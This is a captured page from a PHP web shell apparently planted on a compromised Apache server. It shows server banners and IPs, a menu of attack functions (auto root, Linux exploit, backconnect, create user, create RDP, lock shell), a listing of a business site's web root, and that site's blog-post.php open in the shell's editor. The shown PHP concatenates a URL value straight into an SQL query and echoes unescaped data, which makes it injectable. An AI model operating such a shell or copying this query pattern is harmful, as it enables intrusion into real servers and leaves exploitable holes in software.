Linux ip-172-26-5-244 6.1.0-28-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.119-1 (2024-11-22) x86_64
Apache
: 172.26.5.244 | : 216.73.216.21
Cant Read [ /etc/named.conf ]
8.3.14
daemon
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
opt /
bitnami /
apache /
htdocs /
[ HOME SHELL ]
Name
Size
Permission
Action
PHPMailer
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
inc
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
php
[ DIR ]
drwxr-xr-x
plugins
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxr-xr-x
videos
[ DIR ]
drwxr-xr-x
.htaccess
844
B
-rw-r--r--
-----index.html
4.76
KB
-rw-rw-r--
---catalogue.php
74.37
KB
-rw-r--r--
360.php
15.2
KB
-rw-r--r--
73766.jpg
997.9
KB
-rw-r--r--
Cart.class.php
6.98
KB
-rw-r--r--
about-us.php
32.79
KB
-rw-r--r--
add_cart.php
325
B
-rw-r--r--
aj_get_color_test2.php
29.86
KB
-rw-r--r--
aj_get_finish_test2.php
29.31
KB
-rw-r--r--
aj_get_size_test.php
32.16
KB
-rw-r--r--
aj_more_post.php
9.05
KB
-rw-r--r--
aj_more_post_finish.php
8.56
KB
-rw-r--r--
annual-retuns.php
11.32
KB
-rw-r--r--
blog-post.php
13.56
KB
-rw-r--r--
blog.php
6.47
KB
-rw-r--r--
builder.php
36.27
KB
-rw-r--r--
career.php
26.97
KB
-rw-r--r--
cart.php
6.65
KB
-rw-r--r--
catalogue.php
81.01
KB
-rw-r--r--
certifications.php
43.86
KB
-rw-r--r--
clear_cart.php
142
B
-rw-r--r--
composer.json
70
B
-rw-r--r--
composer.lock
15.78
KB
-rw-r--r--
csr.php
33.49
KB
-rw-r--r--
dealer-1.php
27.75
KB
-rw-r--r--
dealer.php
84.36
KB
-rw-r--r--
dealerbkp.php
55.94
KB
-rw-r--r--
delete_item.php
394
B
-rw-r--r--
design_by_italy.php
14.43
KB
-rw-r--r--
event_details.php
6.45
KB
-rw-r--r--
fetch_collection.php
846
B
-rw-r--r--
fetch_finish.php
904
B
-rw-r--r--
fetch_sizes.php
906
B
-rw-r--r--
fetch_surfaces.php
812
B
-rw-r--r--
fpdf.css
1.31
KB
-rw-r--r--
fpdf.php
49.65
KB
-rw-r--r--
generate_pdf.php
2.78
KB
-rw-r--r--
global-export.php
101.88
KB
-rw-r--r--
global-market-1.php
17.76
KB
-rw-r--r--
id-mapping.json
16.73
KB
-rw-r--r--
index.php
129.78
KB
-rw-r--r--
interior-architecture-2.php
59
KB
-rw-r--r--
interior-architecture.php
67.44
KB
-rw-r--r--
landing_page.html
9.74
KB
-rw-r--r--
located-us.php
34.96
KB
-rw-r--r--
manufacturer-and-supplier.php
73.38
KB
-rw-r--r--
milestones.php
15.72
KB
-rw-r--r--
news-play.php
6.62
KB
-rw-r--r--
product-detail-2.php
41.38
KB
-rw-r--r--
product-detail.php
38.5
KB
-rw-r--r--
product-list-back.php
33.34
KB
-rw-r--r--
product-list.php
37.42
KB
-rw-r--r--
product-search.php
28.81
KB
-rw-r--r--
promoter-profile.php
8.8
KB
-rw-r--r--
robots.txt
99
B
-rw-r--r--
save_cart.php
269
B
-rw-r--r--
search_result_all.php
8.51
KB
-rw-r--r--
search_result_application.php
6.78
KB
-rw-r--r--
search_result_color.php
8.93
KB
-rw-r--r--
search_result_finish.php
8.87
KB
-rw-r--r--
search_result_size.php
7.24
KB
-rw-r--r--
server-smtp.php
3.3
KB
-rw-r--r--
server.php
1.19
KB
-rw-r--r--
showroom.php
2.19
KB
-rw-r--r--
sitemap.xml
60.69
KB
-rw-r--r--
tiles-calculator.php
25.23
KB
-rw-r--r--
view_cart.php
3.17
KB
-rw-r--r--
volume.php
47.04
KB
-rw-r--r--
volume_bkp.php
35.94
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : blog-post.php
<?php include "inc/header.php"; ?> <?php include "inc/menu.php"; ?> <?php $url = parse_url($_SERVER["REQUEST_URI"], PHP_URL_PATH); $url_array = explode("/", $url); $id = $url_array[2]; $sel_query = "SELECT * from tbl_blogs where blog_id = '" . $id . "'"; $result = mysqli_query($conn, $sel_query); while ($blog = mysqli_fetch_assoc($result)) { ?> <style> .blog-banner { min-height: 400px; max-height: 400px; } .blog-grid { max-width: 1368px !important; } .blog-grid .entry-title { margin: 15px 0px !important; } .blog-grid h2 { margin: 15px 0px !important; font-size: 28px; line-height: 38px; } .blog-grid h3 { margin: 15px 0px !important; font-size: 24px; line-height: 34px; letter-spacing: 0px; } .blog-grid h4 { margin: 15px 0px !important; font-size: 20px; line-height: 30px; letter-spacing: 0px; } .blog-grid h5 { margin: 15px 0px !important; font-size: 16px; line-height: 26px; letter-spacing: 0px; } .blog-banner .banner-title { font-size: 40px; font-weight: 500; } .blog-grid ul li p { display: inline; } .blog-grid ul { list-style: auto inside; } .blog-grid a { color: #29afed !important; } .recent-blogs .cat-item a { font-size: 18px !important; line-height: 24px !important; text-transform: capitalize !important; margin-top: 15px !important; letter-spacing: 0.2px !important; } .recent-blogs .cat-item { box-shadow: 0px 0px 22px #f3f3f3de; padding: 18px; text-align: start; border-radius: 10px; margin-bottom: 35px; } .recent-blogs .cat-item img { min-height: 180px; max-height: 180px; object-fit: cover; border-radius: 7px; } .wp-block-categories-list.wp-block-categories { display: grid; grid-template-columns: repeat(3, 1fr); gap: 20px; } .wp-block-categories-list.wp-block-categories p { margin-top: 5px; } @media (max-width: 992px) { .wp-block-categories-list.wp-block-categories { grid-template-columns: repeat(2, 1fr); } .blog-banner { min-height: 200px; max-height: 200px; } } @media (max-width: 576px) { .wp-block-categories-list.wp-block-categories { grid-template-columns: 1fr; } .blog-banner { min-height: 200px; max-height: 200px; } } .widget.widget_block .wp-block-categories .cat-item:last-child a { margin: 15px 0 8px !important; } .pt-80 { padding-top: 80px; } .pb-80 { padding-bottom: 80px; } </style> <div id="qodef-page-outer"> <!-- <img width="1300" height="908" src="" class="" alt="<?= $blog['blog_name']; ?>"> --> <section class="page-banner blog-banner" style="background: url('uploads/blog_images/<?= $blog['blog_image']; ?>') center center / cover no-repeat !important;"> <div class="banner-overlay"></div> <div class="container"> <div class="banner-content"> <nav class="breadcrumbs"> <a href="index.php">Home</a> <span>/</span> <span class="current"><a href="blog.php">Blog</a></span> </nav> <h1 class="banner-title"><?= $blog['blog_name']; ?></h1> </div> </div> </section> <!-- <div class="qodef-page-title qodef-m qodef-title--breadcrumbs qodef-alignment--left qodef-vertical-alignment--header-bottom"> <div class="qodef-m-inner"> <div class="qodef-m-content qodef-content-full-width"> <div itemprop="breadcrumb" class="qodef-breadcrumbs"> <a itemprop="url" class="qodef-breadcrumbs-link" href="index.php"> <span itemprop="title">Home</span> </a> <span class="qodef-breadcrumbs-separator"></span> <span itemprop="title" class="qodef-breadcrumbs-current">Media</span> <span class="qodef-breadcrumbs-separator"></span> <a itemprop="url" class="qodef-breadcrumbs-link" href="blog.php"> <span itemprop="title" class="qodef-breadcrumbs-current">Blog</span> </a> <span class="qodef-breadcrumbs-separator"></span> <span itemprop="title" class="qodef-breadcrumbs-current">Blog Post</span> </div> <div itemprop="breadcrumb" class="qodef-breadcrumbs"> <h4 class="page-heading"> <?= $blog['blog_name']; ?> </h4> </div> </div> </div> </div> --> <div id="qodef-page-inner" class="qodef-content-grid blog-grid"> <main id="qodef-page-content" class="qodef-grid qodef-layout--template pt-80 pb-80" role="main"> <div class="qodef-grid-inner clear"> <div class="qodef-grid-item qodef-page-content-section qodef-col--12"> <div data-elementor-type="wp-page" data-elementor-id="1903" class="elementor elementor-1903"> <article class="qodef-blog-item qodef-e post-2586 post type-post status-publish format-standard has-post-thumbnail hentry category-materials tag-design tag-materials tag-technology"> <div class="qodef-e-inner"> <!-- <div class="qodef-e-media"> <div class="qodef-e-media-image"> <img width="1300" height="908" src="uploads/blog_images/<?= $blog['blog_image']; ?>" class="" alt="<?= $blog['blog_name']; ?>"> </div> </div> --> <div class="qodef-e-content"> <div class="qodef-e-text"> <div data-elementor-type="wp-post" data-elementor-id="2586" class="elementor elementor-2586"> <section class="elementor-section elementor-top-section elementor-element elementor-element-993e49c elementor-section-full_width elementor-section-height-default elementor-section-height-default qodef-elementor-content-no qodef-elementor-column-no" data-id="993e49c" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-99ca26b" data-id="99ca26b" data-element_type="column"> <div class="elementor-widget-wrap elementor-element-populated"> <div class="elementor-element elementor-element-37a7d0b elementor-widget elementor-widget-text-editor" data-id="37a7d0b" data-element_type="widget" data-widget_type="text-editor.default"> <div class="elementor-widget-container"> <?= $blog['blog_description']; ?> </div> </div> </div> </div> </div> </section> </div> </div> <!-- <div class="qodef-e-media"> <div class="qodef-e-media-image"> <img width="1300" height="908" src="img/blog-2.jpg" class="" alt="blog"> </div> </div> --> </div> </div> </article> </div> </div> <div class="qodef-grid-item qodef-page-sidebar-section qodef-col--12 recent-blogs"> <aside id="qodef-page-sidebar" role="complementary"> <div id="block-28" class="widget widget_block" data-area="qodef-main-sidebar"> <div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-1 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <div class="widget widget_hiroshi_core_title_widget"> <h4 class="qodef-m-title color-blue"> <b>Recent Posts</b> </h4> </div> <ul class="wp-block-categories-list wp-block-categories"> <?php $sel_recent = "SELECT * from tbl_blogs ORDER BY RAND() Limit 3"; $results = mysqli_query($conn, $sel_recent); while ($recent = mysqli_fetch_assoc($results)) { ?> <li class="cat-item cat-item-42"> <img width="1300" height="908" src="uploads/blog_images/<?= $recent['blog_image']; ?>" class="" alt="<?= $recent['blog_name']; ?>"> <a href="blogs/<?= $recent['blog_id']; ?>/<?= $recent['blog_slug']; ?>"><?= $recent['blog_name']; ?></a> <p><?= $recent['blog_meta_desc']; ?></p> </li> <?php } ?> </ul> </div> </div> </div> <!-- <div id="block-29" class="widget widget_block" data-area="qodef-main-sidebar"> <div class="wp-block-columns is-layout-flex wp-container-core-columns-is-layout-2 wp-block-columns-is-layout-flex"> <div class="wp-block-column is-layout-flow wp-block-column-is-layout-flow"> <div class="widget widget_hiroshi_core_title_widget"> <h6 class="qodef-m-title color-blue"> <b>Archives</b> </h6><br> </div> <ul class="wp-block-categories-list wp-block-categories"> <li class="cat-item cat-item-42"><a href="#">March 2022</a> </li> <li class="cat-item cat-item-41"><a href="#">February 2022</a> </li> <li class="cat-item cat-item-45"><a href="#">January 2022</a> </li> <li class="cat-item cat-item-43"><a href="#">December 2021</a> </li> </ul> </div> </div> </div> --> </aside> </div> </div> </main> </div> </div> <?php } ?> <?php include "inc/footer.php"; ?>
Close